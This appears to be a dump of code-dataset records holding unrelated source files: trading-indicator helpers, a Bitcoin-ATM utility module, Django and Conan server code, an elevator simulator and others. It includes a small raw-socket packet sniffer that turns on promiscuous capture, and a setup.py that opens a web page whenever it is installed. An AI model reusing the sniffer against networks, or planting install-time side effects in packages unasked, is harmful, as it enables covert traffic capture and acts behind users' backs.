rewards\n                Q.updateStateAndAction(state, action, newState, newAction, reward) # update the Q-table\n                action = newAction\n\n            can, value = e.getOptimalValue()\n            if can and value:\n                bestValue.append([value, can])\n            e.printOptimalValue()\n        logger.debug(\"bestValue: {}\".format(bestValue))\n        try:\n            bestValue.sort()\n            logger.info(\"bestValue store: {}\".format(bestValue[0]))\n            globalBestValue.append(bestValue[0])\n        except Exception as e:\n            logger.error(\"sort bestValue fail, except: {}\".format(str(e)))\n\n    globalBestValue.sort()\n    logger.info(\"global best value: {}\".format(globalBestValue[0]))\n    endTime = datetime.datetime.now() \n    logger.info(\"run time: {}\".format(str(endTime - startTime)))\n    io.saveData(Q, QSavingPath)\n\ndef testGeneratePoints():\n    \"\"\"Test: starting-point grid generation\"\"\"\n    lowBoundary = [-300, -300, -300, -300, -200]\n    upBoundary = [300, 300, 100, 300, 200]\n    ret = generatePoints(lowBoundary, upBoundary, 3)\n\n\nif __name__ == '__main__':\n    main()\n    # logger.error(\"error test\")","sub_path":"tool/毕设代码/script/sarsaOptimizationBackup.py","file_name":"sarsaOptimizationBackup.py","file_ext":"py","file_size_in_byte":10858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"}
+{"seq_id":"396152824","text":"import robin_stocks as r\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as plticker\nimport numpy as np\nfrom termcolor import colored\n\n# cached historicals\nhistoricals = {}\n\ndef cross_to_str(cross):\n    \"\"\"Converts cross int to readable string\n\n    Args:\n        cross(bool)\n\n    Returns:\n        cross_str(string)\n    \"\"\"\n    if cross == True:\n        return colored(\"Bullish\", 'green')\n    else:\n        return colored(\"Bearish\", 'red')\n\ndef rsi_to_str(rsi):\n    \"\"\"Converts rsi float to readable string\n\n    Args:\n        rsi(float)\n\n    Returns:\n        rsi_str(string)\n    \"\"\"\n    if rsi <= 30:\n        return colored(str('%.2f' % rsi), 'green')\n    elif rsi >= 70:\n        return colored(str('%.2f' % rsi), 'red')\n    else:\n        return str('%.2f' % rsi)\n\ndef macd_to_str(macd):\n    \"\"\"Converts macd float to readable string\n\n    Args:\n        macd(float)\n\n    Returns:\n        macd_str(string)\n    \"\"\"\n    if macd > 0:\n        return colored(str('%.2f' % macd), 'green')\n    else:\n        return colored(str('%.2f' % macd), 'red')\n\ndef rating_to_str(rating):\n    \"\"\"Converts rating float to readable string\n\n    Args:\n        rating(float)\n\n    Returns:\n        rating_str(string)\n    \"\"\"\n    if rating >= 70:\n        return colored(str('%.0f' % rating), 'green')\n    else:\n        return colored(str('%.0f' % rating), 'red')\n\ndef print_table(stock_data):\n    \"\"\"Prints a table of all stock symbols and key indicators\n\n    Args:\n        stock_data(dict)\n\n    Returns:\n        None\n    \"\"\"\n    # print (\"{}\\t{}\\t\\t{}\\t{}\\t{}\\t{}\".format('SYMBOL', 'PRICE', 'RSI', 'MACD', 'RATING', 'EMA')) \n\n    potential_stocks = []\n\n    for data in stock_data: \n        # print (\"{}\\t${:.2f}\\t\\t{}\\t{}\\t{}\\t{}\".format(data['symbol'], data['price'], rsi_to_str(data['rsi']), macd_to_str(data['macd']), rating_to_str(data['buy_rating']), cross_to_str(data['cross'])))\n        if (data['rsi'] < 45) and (data['price'] < 200) and (data['macd'] > -1) and (data['buy_rating'] >= 70) and (data['cross'] == True):\n            potential_stocks.append(data)\n\n    print()\n    print(\"STOCKS TO CHECK OUT\")\n    print(\"-------------------\")\n    print()\n    print (\"{}\\t{}\\t\\t{}\\t{}\\t{}\\t{}\".format('SYMBOL', 'PRICE', 'RSI', 'MACD', 'RATING', 'EMA')) \n    print()\n\n    for data in potential_stocks:\n        print (\"{}\\t${:.2f}\\t\\t{}\\t{}\\t{}\\t{}\".format(data['symbol'], data['price'], rsi_to_str(data['rsi']), macd_to_str(data['macd']), rating_to_str(data['buy_rating']), cross_to_str(data['cross'])))\n
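# Sketch of the same screening rule with named thresholds (the values mirror\n# the hard-coded ones in print_table above; the function name is hypothetical):\n#   SCREEN = {'rsi_max': 45, 'price_max': 200, 'macd_min': -1, 'rating_min': 70}\n#   def passes_screen(d):\n#       return (d['rsi'] < SCREEN['rsi_max'] and d['price'] < SCREEN['price_max']\n#               and d['macd'] > SCREEN['macd_min']\n#               and d['buy_rating'] >= SCREEN['rating_min'] and d['cross'])\n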
\ndef show_plot(price, firstIndicator, secondIndicator, dates, symbol=\"\", label1=\"\", label2=\"\"):\n    \"\"\"Displays a chart of the price and indicators for a stock\n\n    Args:\n        price(Pandas series): Series containing a stock's prices\n        firstIndicator(Pandas series): Series containing a technical indicator, such as 50-day moving average\n        secondIndicator(Pandas series): Series containing a technical indicator, such as 200-day moving average\n        dates(Pandas series): Series containing the dates that correspond to the prices and indicators\n        label1(str): Chart label of the first technical indicator\n        label2(str): Chart label of the second technical indicator\n\n    Returns:\n        None\n    \"\"\"\n    plt.figure(figsize=(10,5))\n    plt.title(symbol)\n    plt.plot(dates, price, label=\"Closing prices\")\n    plt.plot(dates, firstIndicator, label=label1)\n    plt.plot(dates, secondIndicator, label=label2)\n    plt.yticks(np.arange(price.min(), price.max(), step=((price.max()-price.min())/15.0)))\n    plt.legend()\n    plt.show()\n\ndef get_equity_data():\n    \"\"\"Displays a pie chart of your portfolio holdings\n    \"\"\"\n    holdings_data = r.build_holdings()\n    labels = []\n    equities = []\n    for key, value in holdings_data.items():\n        # label each slice with the instrument name, sized by its portfolio percentage\n        labels.append(value.get('name'))\n        equities.append(float(value.get('percentage')))\n    fig1, ax1 = plt.subplots()\n    ax1.pie(equities, labels=labels, autopct='%1.1f%%',\n        shadow=True, startangle=90)\n    ax1.axis('equal')  # equal aspect ratio so the pie is drawn as a circle\n    plt.show()\n\ndef get_historicals(symbol):\n    \"\"\"Returns cached historical price data for a stock, fetching it once per run\n\n    Args:\n        symbol(str): Symbol of the stock to fetch historicals for\n\n    Returns:\n        The historical data returned by r.get_historicals for the past year\n    \"\"\"\n    if symbol not in historicals.keys():\n        historicals[symbol] = r.get_historicals(symbol, span='year', bounds='regular')\n        # print(\"Fetched historicals for: {}\".format(symbol))\n    return historicals[symbol]","sub_path":"robinhoodbot/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":4696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
+{"seq_id":"284803445","text":"import sys\nimport webbrowser\nfrom distutils.core import setup\n\ntrailer_url = 'http://youtube.com/v/rC8VJ9aeB_g?hd=1&autoplay=1'\n\nif 'install' in sys.argv:\n    webbrowser.open_new(trailer_url)\n\n\nsetup(\n    name='django-unchained',\n    version='1.0',\n    maintainer='Jannis Leidel',\n    maintainer_email='jannis@leidel.info',\n    url=trailer_url)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
+{"seq_id":"42303176","text":"\n#import RPi.GPIO as GPIO\nimport logging\nimport os\nimport requests\nimport sys\nimport config\nimport math\n# import qr\n\n\nfrom PIL import ImageFont\nfrom pathlib import Path\n\nlogger = logging.getLogger(\"UTILS\")\n\nled = \"off\"\n\n\n## Just copy-pasted the methods here - better check that all is good\n\n\ndef coins_inserted():\n    \"\"\"Actions coins inserted\n    \"\"\"\n    global led\n\n    if config.FIAT == 0:\n        config.BTCPRICE = utils.get_btc_price(config.conf[\"atm\"][\"cur\"])\n        config.SATPRICE = math.floor((1 / (config.BTCPRICE * 100)) * 100000000)\n        logger.info(\"Satoshi price updated\")\n\n    if config.PULSES == 2:\n        config.FIAT += 0.02\n        config.SATS = utils.get_sats()\n        config.SATSFEE = utils.get_sats_with_fee()\n        config.SATS -= config.SATSFEE\n        logger.info(\"2 cents added\")\n        display.update_amount_screen()\n    if config.PULSES == 3:\n        config.FIAT += 0.05\n        config.SATS = utils.get_sats()\n        config.SATSFEE = utils.get_sats_with_fee()\n        config.SATS -= config.SATSFEE\n        logger.info(\"5 cents added\")\n        display.update_amount_screen()\n    if config.PULSES == 4:\n        config.FIAT += 0.1\n        config.SATS = 
utils.get_sats()\n config.SATSFEE = utils.get_sats_with_fee()\n config.SATS -= config.SATSFEE\n logger.info(\"10 cents added\")\n display.update_amount_screen()\n if config.PULSES == 5:\n config.FIAT += 0.2\n config.SATS = utils.get_sats()\n config.SATSFEE = utils.get_sats_with_fee()\n config.SATS -= config.SATSFEE\n logger.info(\"20 cents added\")\n display.update_amount_screen()\n if config.PULSES == 6:\n config.FIAT += 0.5\n config.SATS = utils.get_sats()\n config.SATSFEE = utils.get_sats_with_fee()\n config.SATS -= config.SATSFEE\n logger.info(\"50 cents added\")\n display.update_amount_screen()\n if config.PULSES == 7:\n config.FIAT += 1\n config.SATS = utils.get_sats()\n logger.info(\"100 cents added\")\n display.update_amount_screen()\n config.PULSES = 0\n\n if config.FIAT > 0 and led == \"off\":\n # Turn on the LED after first coin\n GPIO.output(13, GPIO.HIGH)\n led = \"on\"\n logger.info(\"Button-LED turned on (if connected)\")\n\ndef monitor_coins_and_button():\n \"\"\"Monitors coins inserted and buttons pushed\n \"\"\"\n global led\n time.sleep(0.2)\n if (time.time() - config.LASTIMPULSE > 0.5) and (config.PULSES > 0):\n coins_inserted(led)\n\n # Detect if the button has been pushed\n if (time.time() - config.LASTPUSHES > 1) and (config.PUSHES > 0):\n button_pushed()\n\ndef button_pushed():\n \"\"\"Actions button pushes by number\n \"\"\"\n if config.PUSHES == 1:\n \"\"\"If no coins inserted, update the screen.\n If coins inserted, scan a qr code for the exchange amount\n \"\"\"\n if config.FIAT == 0:\n display.update_nocoin_screen()\n time.sleep(3)\n display.update_startup_screen()\n\n if not config.conf[\"atm\"][\"activewallet\"]:\n logger.error(\"No wallet has been configured for the ATM.\")\n # Softreset and startup screen\n softreset()\n\n if config.conf[\"atm\"][\"activewallet\"] == \"btcpay_lnd\":\n display.update_qr_request()\n qrcode = qr.scan()\n config.INVOICE = lndrest.evaluate_scan(qrcode)\n while config.INVOICE is False:\n display.update_qr_failed()\n time.sleep(1)\n display.update_qr_request()\n qrcode = qr.scan()\n config.INVOICE = lndrest.evaluate_scan(qrcode)\n display.update_payout_screen()\n lndrest.handle_invoice()\n softreset()\n elif config.conf[\"atm\"][\"activewallet\"] == \"lntxbot\":\n lntxbot.process_using_lnurl(config.SATS)\n # Softreset and startup screen\n softreset()\n # lntxbot.payout(config.SATS, config.INVOICE)\n else:\n pass\n\n if config.PUSHES == 3:\n \"\"\"Scan and store new wallet credentials\n \"\"\"\n # Delete current wallet flag and credentials\n config.update_config(\"atm\", \"activewallet\", \"\")\n config.update_config(\"lntxbot\", \"creds\", \"\")\n config.update_config(\"lnd\", \"macaroon\", \"\")\n\n display.update_wallet_scan()\n qr.scan_credentials()\n importlib.reload(config)\n\n if config.conf[\"atm\"][\"activewallet\"] == \"btcpay_lnd\":\n display.update_btcpay_lnd()\n elif config.conf[\"atm\"][\"activewallet\"] == \"lntxbot\":\n balance = lntxbot.get_lnurl_balance()\n display.update_lntxbot_balance(balance)\n else:\n logger.error(\"Scanning of wallet credentials failed.\")\n\n softreset()\n\n if config.PUSHES == 4:\n \"\"\"Simulates adding a coin\n \"\"\"\n logger.info(\"Button pushed four times (add coin)\")\n print(\"Button pushed four times (add coin)\")\n config.PULSES = 2\n\n if config.PUSHES == 6:\n \"\"\"Shutdown the host machine\n \"\"\"\n display.update_shutdown_screen()\n GPIO.cleanup()\n logger.warning(\"ATM shutdown (6 times button)\")\n os.system(\"sudo shutdown -h now\")\n config.PUSHES = 0\n\n\n\ndef 
softreset():\n \"\"\"Displays startup screen and deletes fiat amount\n \"\"\"\n global led\n config.SATS = 0\n config.FIAT = 0\n # Turn off button LED\n GPIO.output(13, GPIO.LOW)\n led = \"off\"\n\n display.update_startup_screen()\n logger.info(\"Softreset executed\")\n\n\ndef button_event(channel):\n \"\"\"Registers a button push event\n \"\"\"\n config.LASTPUSHES = time.time()\n config.PUSHES = config.PUSHES + 1\n\n\ndef coin_event(channel):\n \"\"\"Registers a coin insertion event\n \"\"\"\n config.LASTIMPULSE = time.time()\n config.PULSES = config.PULSES + 1\n\n\ndef setup_coin_acceptor():\n \"\"\"Initialises the coin acceptor parameters and sets up a callback for button pushes\n and coin inserts.\n \"\"\"\n # Defining GPIO BCM Mode\n GPIO.setmode(GPIO.BCM)\n\n # Setup GPIO Pins for coin acceptor, button and button-led\n GPIO.setwarnings(False)\n GPIO.setup(13, GPIO.OUT)\n GPIO.output(13, GPIO.LOW)\n GPIO.setup(5, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n GPIO.setup(6, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n\n # Setup coin interrupt channel (bouncetime for switch bounce)\n GPIO.add_event_detect(5, GPIO.RISING, callback=button_event, bouncetime=300)\n GPIO.add_event_detect(6, GPIO.FALLING, callback=coin_event)\n\n\ndef check_epd_size():\n \"\"\"Check EPD_SIZE is defined\n \"\"\"\n if os.path.exists(\"/etc/default/epd-fuse\"):\n exec(open(\"/etc/default/epd-fuse\").read(), globals())\n\n if EPD_SIZE == 0.0:\n print(\"Please select your screen size by running 'papirus-config'.\")\n sys.exit()\n\n\ndef create_font(font, size):\n \"\"\"Create fonts from resources\n \"\"\"\n # Construct paths to foder with fonts\n pathfreemono = Path.cwd().joinpath(\"resources\", \"fonts\", \"FreeMono.ttf\")\n pathfreemonobold = Path.cwd().joinpath(\"resources\", \"fonts\", \"FreeMonoBold.ttf\")\n pathsawasdee = Path.cwd().joinpath(\"resources\", \"fonts\", \"Sawasdee-Bold.ttf\")\n\n if font == \"freemono\":\n return ImageFont.truetype(pathfreemono.as_posix(), size)\n if font == \"freemonobold\":\n return ImageFont.truetype(pathfreemonobold.as_posix(), size)\n if font == \"sawasdee\":\n return ImageFont.truetype(pathsawasdee.as_posix(), size)\n else:\n print(\"Font not available\")\n\n\ndef get_btc_price(fiat_code):\n \"\"\"Get BTC -> FIAT conversion\n \"\"\"\n url = config.COINGECKO_URL_BASE + \"simple/price\"\n price = requests.get(\n url, params={\"ids\": \"bitcoin\", \"vs_currencies\": fiat_code}\n ).json()\n return price[\"bitcoin\"][fiat_code]\n\n\ndef get_sats():\n return config.FIAT * 100 * config.SATPRICE\n\n\ndef get_sats_with_fee():\n return math.floor(config.SATS * (float(config.conf[\"atm\"][\"fee\"]) / 100))\n\n\n##### from configfile\n\ndef init_config_logging():\n # Set to logging.DEBUG if more \"requests\" debugging info needed\n logging.getLogger(\"requests\").setLevel(logging.INFO)\n logging.getLogger(\"urllib3.connectionpool\").setLevel(logging.INFO)\n\n # Configure basigConfig for the \"logging\" module\n logging.basicConfig(\n filename=\"{}/debug.log\".format(ATM_data_dir),\n format=\"%(asctime)-23s %(name)-9s %(levelname)-7s | %(message)s\",\n datefmt=\"%Y/%m/%d %I:%M:%S %p\",\n level=logging.DEBUG,\n )\n\n # Create logger for this config file\n logger = logging.getLogger(\"CONFIG\")\n\n\n yes = [\"yes\", \"ye\", \"y\"]\n no = [\"no\", \"n\"]\n\n\ndef ask_scan_config_val(section, variable):\n while True:\n try:\n res = input(\n \"Do you want to scan to input {} {}\".format(section, variable)\n ).lower()\n if res in yes:\n # value = scan the qr for the value\n # update_config(section, 
variable, value\n ...\n elif res in no:\n return\n else:\n print(\"Input invalid, please try again or KeyboardInterrupt to exit\")\n except KeyboardInterrupt:\n return\n\n\ndef check_config():\n \"\"\"Checks the config and prompt the user to provide values for missing keys\n \"\"\"\n if conf[\"lnd\"][\"macaroon\"] is (None or \"\"):\n logger.warning(\"Missing value for lnd macaroon in config\")\n ask_scan_config_val(\"lnd\", \"macaroon\")\n if conf[\"lntxbot\"][\"creds\"] is (None or \"\"):\n logger.warning(\"Missing value for lntxbot credential in config\")\n ask_scan_config_val(\"lntxbot\", \"creds\")\n\n\ndef update_config(section, variable, value):\n \"\"\"Update the config with the new value for the variable.\n If dangermode is on, we save them to config.ini, else we write them to the temporary\n dictionary\n \"\"\"\n if conf[\"atm\"][\"dangermode\"].lower() == \"on\":\n config = create_config()\n config[section][variable] = value\n\n with open(CONFIG_FILE, \"w\") as configfile:\n config.write(configfile)\n else:\n conf[section][variable] = value\n\n\ndef check_dangermode():\n if conf[\"atm\"][\"dangermode\"].lower() == \"on\":\n return True\n else:\n return False\n\n\n# config file handling\ndef get_config_file():\n # check that the config file exists, if not copy over the example_config\n if not os.path.exists(ATM_data_dir + \"config.ini\"):\n example_config = os.path.join(os.path.dirname(__file__), \"example_config.ini\")\n copyfile(example_config, ATM_data_dir + \"config.ini\")\n return os.environ.get(\"CONFIG_FILE\", config_file_path)\n\n\ndef create_config(config_file=None):\n parser = ConfigParser(comment_prefixes=\"/\", allow_no_value=True, strict=False)\n parser.read(config_file or CONFIG_FILE)\n return parser\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":10814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"218384040","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='LevelOne',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=200)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='LevelThree',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=200)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='LevelTwo',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=200)),\n ('level', models.ForeignKey(to='multileveltest.LevelOne')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='TopLevel',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=200)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='levelthree',\n name='level',\n field=models.ForeignKey(to='multileveltest.LevelTwo'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='levelone',\n name='level',\n field=models.ForeignKey(to='multileveltest.TopLevel'),\n preserve_default=True,\n ),\n 
]\n","sub_path":"multileveltest/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"520777257","text":"import codecs\nimport json\nimport os\n\nfrom bottle import request\n\nfrom conans import DEFAULT_REVISION_V1\nfrom conans.model.ref import ConanFileReference\nfrom conans.server.rest.bottle_routes import BottleRoutes\nfrom conans.server.service.v1.service import ConanService\n\n\nclass DeleteController(object):\n \"\"\"\n Serve requests related with Conan\n \"\"\"\n @staticmethod\n def attach_to(app):\n\n r = BottleRoutes()\n\n @app.route(r.recipe, method=\"DELETE\")\n def remove_recipe(name, version, username, channel, auth_user):\n \"\"\" Remove any existing recipes or its packages created.\n Will remove all revisions, packages and package revisions (parent folder)\"\"\"\n ref = ConanFileReference(name, version, username, channel)\n conan_service = ConanService(app.authorizer, app.server_store, auth_user)\n conan_service.remove_conanfile(ref)\n\n @app.route('%s/delete' % r.packages, method=\"POST\")\n def remove_packages(name, version, username, channel, auth_user):\n ref = ConanFileReference(name, version, username, channel)\n conan_service = ConanService(app.authorizer, app.server_store, auth_user)\n reader = codecs.getreader(\"utf-8\")\n payload = json.load(reader(request.body))\n conan_service.remove_packages(ref, payload[\"package_ids\"])\n\n @app.route('%s/remove_files' % r.recipe, method=\"POST\")\n def remove_recipe_files(name, version, username, channel, auth_user):\n # The remove files is a part of the upload process, where the revision in v1 will\n # always be DEFAULT_REVISION_V1\n revision = DEFAULT_REVISION_V1\n ref = ConanFileReference(name, version, username, channel, revision)\n conan_service = ConanService(app.authorizer, app.server_store, auth_user)\n reader = codecs.getreader(\"utf-8\")\n payload = json.load(reader(request.body))\n files = [os.path.normpath(filename) for filename in payload[\"files\"]]\n conan_service.remove_conanfile_files(ref, files)\n","sub_path":"conans/server/rest/controller/v1/delete.py","file_name":"delete.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"242457202","text":"import socket\nimport os\n\nhost = '0.0.0.0'\nonwin = os.name == 'nt'\nif onwin:\n sock_prot = socket.IPPROTO_IP\nelse:\n sock_prot = socket.IPPROTO_ICMP\n\nsniffer = socket.socket(socket.AF_INET, socket.SOCK_RAW, sock_prot)\nsniffer.bind((host, 0))\nsniffer.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)\n\nif onwin:\n sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)\n\nprint(sniffer.recvfrom(65535))\n\nif onwin:\n sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)","sub_path":"simpsnif.py","file_name":"simpsnif.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"82090784","text":"#!/usr/bin/env python3\n\nimport sys\nimport json\nimport shutil\nfrom pathlib import Path\n\nEXPECTED_ARGS = 3\nCHMOD_EXTENSIONS = [\".sh\", \".py\"]\nplatform = None\n\ndef usage(errorMsg):\n print(\"Usage: import.py \")\n if errorMsg:\n print(\"Error: \" + errorMsg)\n\ndef getPlatform():\n rawPlatform = sys.platform.lower()\n if rawPlatform.startswith(\"win\"):\n platform = \"Windows\"\n elif rawPlatform.startswith(\"darwin\"):\n platform = 
\"Mac\"\n elif rawPlatform.startswith(\"linux\"):\n platform = \"Linux\"\n else:\n raise Exception(\"Unknown platform\")\n return platform\n\ndef readConfigFile(repoDir):\n global platform\n platform = getPlatform()\n with Path(repoDir, \"mappings.json\").open() as json_file:\n mapping = json.load(json_file)\n return [x for x in mapping if platform in x[\"Platforms\"]]\n\ndef recursiveCopyNode(srcLoc, dstLoc, mode):\n #print(\"recursiveCopyNode({0},{1})\".format(srcLoc, dstLoc))\n if not srcLoc.exists():\n print(\"{0} does not exist\".format(srcLoc))\n elif srcLoc.is_dir():\n print(\"In Dir: {0}\".format(srcLoc))\n dstLoc.mkdir(parents=True, exist_ok=True)\n for node in srcLoc.iterdir():\n fileName = node.relative_to(srcLoc);\n recursiveCopyNode(node, Path(dstLoc, fileName), mode)\n else:\n print(\" v--< {0}\\n +--> {1}\\n\".format(srcLoc, dstLoc))\n shutil.copy(str(srcLoc), str(dstLoc))\n if dstLoc.suffix in CHMOD_EXTENSIONS and platform != \"Windows\" and mode == \"import\":\n dstLoc.chmod(0o740)\n\ndef processMapping(homeDir, repoDir, mode, mapping):\n repoLoc = Path(repoDir, mapping[\"Source\"])\n homeLoc = Path(homeDir, mapping[\"Destination\"])\n if mode == \"import\":\n srcLoc = repoLoc\n dstLoc = homeLoc\n else: # \"backup\"\n srcLoc = homeLoc\n dstLoc = repoLoc\n dstLoc.parent.mkdir(parents=True, exist_ok=True)\n recursiveCopyNode(srcLoc, dstLoc, mode)\n\n\ndef importMain():\n numArgs = len(sys.argv)\n #print(\"{0} args: {1}\".format(numArgs, sys.argv))\n if numArgs - 1 != EXPECTED_ARGS:\n usage(\"Expected {0} args, got {1}\".format(EXPECTED_ARGS, numArgs - 1))\n return\n homeDir, repoDir, mode = sys.argv[1:]\n if mode not in [\"import\", \"backup\"]:\n usage(\"invalid mode: {0}\".format(mode))\n return\n config = readConfigFile(repoDir)\n for mapping in config:\n processMapping(homeDir, repoDir, mode, mapping)\n\nimportMain()\n","sub_path":"import.py","file_name":"import.py","file_ext":"py","file_size_in_byte":2496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"123024853","text":"from boxlift_api import BoxLift, Command\nfrom collections import defaultdict\n\nclass Elevator(object):\n\tspeed = None\n\tdirection = None\n\n\tdef __init__(self, id, floor, max_floor):\n\t\tself.id = id\n\t\tself.direction = 1\n\t\tself.speed = 1\n\t\tself.buttons_pressed = []\n\t\tself.floor = floor\n\t\tself.max_floor = max_floor\n\t\tself.assigned_requests = []\n\n\tdef update_elevator(self):\n\t\t\tself.floor += (self.direction * self.speed)\n\n\tdef go_up(self):\n\t\tself.direction = 1\n\n\tdef go_down(self):\n\t\tself.direction = -1\n\n\tdef stop(self):\n\t\tself.speed = 0\n\n\tdef move(self):\n\t\tself.speed = 1\n\n\tdef chose_own_command(self):\n\t\tif self.floor == 0:\n\t\t\tself.go_up()\n\t\t\tself.move()\n\n\t\telif self.floor == self.max_floor:\n\t\t\tself.go_down()\n\t\t\tself.move()\n\n\t\telif self.floor == self.max_floor / 2:\n\t\t\tself.stop()\n\n\tdef fulfill_requests(self):\n\t\tif self.assigned_requests or self.buttons_pressed:\n\t\t\trequested_floors = [\n\t\t\t\trequest['floor'] for request in self.assigned_requests\n\t\t\t]\n\n\t\t\tfor floor in self.buttons_pressed:\n\t\t\t\trequested_floors.append(floor)\n\n\t\t\tif self.floor in requested_floors:\n\t\t\t\tself.stop()\n\n\t\t\t\tfor request in self.assigned_requests:\n\t\t\t\t\tif request['floor'] == self.floor:\n\n\t\t\t\t\t\tself.direction = request['direction']\n\t\t\t\t\t\tself.assigned_requests.remove(request)\n\t\t\t\t\t\tbreak\n\n\t\t\telse:\n\t\t\t\tif 
requested_floors[0] < self.floor:\n\t\t\t\t\tself.go_down()\n\t\t\t\telse:\n\t\t\t\t\tself.go_up()\n\n\t\t\t\tself.move()\n\n\t\telse:\n\t\t\tself.chose_own_command()\n\n\tdef get_command(self):\n\t\treturn Command(\n\t\t\tid=self.id,\n\t\t\tdirection=self.direction,\n\t\t\tspeed=self.speed)\n\n\tdef get_assigned(self, request):\n\t\tif request in self.assigned_requests:\n\t\t\treturn True\n\n\t\tif not self.assigned_requests and not self.buttons_pressed:\n\t\t\tself.assigned_requests.append(request)\n\t\t\treturn True\n\n\t\tif self.direction == request['direction']:\n\t\t\tif self.direction == 1 and self.floor <= request['floor']:\n\t\t\t\tself.assigned_requests.append(request)\n\t\t\t\treturn True\n\n\t\t\telif self.direction == -1 and self.floor >= request['floor']:\n\t\t\t\tself.assigned_requests.append(request)\n\t\t\t\treturn True\n\n\t\treturn False\n\ndef decide_on_commands(state, elevators):\n\tprint('########################')\n\tcommands = []\n\n\talready_assigned_requests = []\n\n\tfor elevator in elevators:\n\t\talready_assigned_requests.extend(elevator.assigned_requests)\n\n\tfor request in state['requests']:\n\t\tif request in already_assigned_requests:\n\t\t\tcontinue\n\n\t\t# find the closest elevator\n\t\televator_by_gaps = defaultdict(list)\n\n\t\tfor elevator in elevators:\n\t\t\tgap = abs(request['floor'] - elevator.floor)\n\t\t\televator_by_gaps[gap].append(elevator)\n\n\t\tassigned = False\n\t\tfor gap in sorted(elevator_by_gaps.keys()):\n\t\t\tif assigned:\n\t\t\t\tbreak\n\n\t\t\tfor elevator in elevator_by_gaps[gap]:\n\t\t\t\tif assigned:\n\t\t\t\t\tbreak\n\n\t\t\t\tassigned = elevator.get_assigned(request)\n\n\t\t\t\tif assigned:\n\t\t\t\t\tprint('elevator ', elevator.id, elevator.floor, 'got assigned', request)\n\n\tfor elevator in elevators:\n\t\televator.fulfill_requests()\n\t\tcommands.append(elevator.get_command())\n\t\televator.update_elevator()\n\n\treturn commands\n\n\n\n\n\nREG_ID = \"11650\"\nPYCON2015_EVENT_NAME = \"pycon2015\"\n\ndef run_simulation(name):\n\n\tlift_api = BoxLift(bot_name='dumbelevator', plan=name, email='sleongkoan@gmail.com',\n\t registration_id=REG_ID, event_name=PYCON2015_EVENT_NAME, sandbox_mode=True)\n\n\tstate = lift_api.send_commands()\n\n\televators = [\n\t\tElevator(\n\t\t\tid=elevator['id'],\n\t\t\tfloor=elevator['floor'],\n\t\t\tmax_floor=state['floors']\n\t\t)\n\n\t\tfor elevator in state['elevators']\n\t]\n\n\t# setup building with elevators from returned state\n\twhile state['status'] != 'finished':\n\n\t commands = decide_on_commands(state, elevators)\n\t state = lift_api.send_commands(commands)\n\n\nrun_simulation('training_1')\n# run_simulation('training_2')\n# run_simulation('training_3')\n# run_simulation('ch_rnd_500_1')\n# run_simulation('ch_rnd_500_2')\n# run_simulation('ch_rnd_500_3')\n# run_simulation('ch_clu_500_1')\n# run_simulation('ch_clu_500_2')\n# run_simulation('ch_clu_500_3')\n# run_simulation('ch_rea_1000_1')\n# run_simulation('ch_rea_1000_2')\n# run_simulation('ch_rea_1000_3')\n","sub_path":"my_lift_obj.py","file_name":"my_lift_obj.py","file_ext":"py","file_size_in_byte":4022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"622394473","text":"import math\nimport random\nfrom .network import Network\n\n# Our erdos_renyi_graph network \nclass SIRModel():\n\n\tdef __init__(self,G,N,p_connected,pv,pi,g,R0):\n\t\tself.N = N\n\t\tself.p_connected = p_connected \n\t\tself.pv = pv\n\t\tself.pi = pi\n\t\tself.g = g\n\t\tself.R0 = R0\n\t\tself.G = 
